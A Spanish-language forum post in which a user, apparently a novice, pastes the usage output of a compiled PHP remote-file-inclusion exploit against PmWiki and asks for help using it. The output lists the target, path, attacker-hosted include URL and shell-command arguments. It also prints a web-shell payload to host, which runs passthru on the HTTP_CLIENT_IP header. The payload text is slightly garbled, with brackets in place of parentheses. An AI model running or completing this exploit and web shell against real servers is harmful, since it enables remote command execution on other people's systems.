bueno por fin pude compilar mi exploit en php con bamcompile , lo ejecuto y me sale lo siguiente:
Usage: php exploit.exe host patch http_loc cmd OPTIONS
host: target server <ip/hostname>
path: path to pmwiki
http_loc: an http site with the code to include <without ending slash>
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php exploit.exe localhost /pmwiki/
Para ver este enlace Registrate o Inicia Sesion ls -la -P1.1.1.1:80
php exploit.exe localhost /pmwiki/
Para ver este enlace Registrate o Inicia Sesion ls -la -p81
Note:
prepare this code in
Para ver este enlace Registrate o Inicia Sesion :
<?php
error_reportin
g<0>;set_time_limit<0>;echo "my_delim";
passthru<$_SERVER["HTTP_CLIENT_IP"];die;
----------------------------------------------------------------------------
Bueno eso es lo q aparece...pero no se q hacer :'(espero q me ayuden

Muchas gracias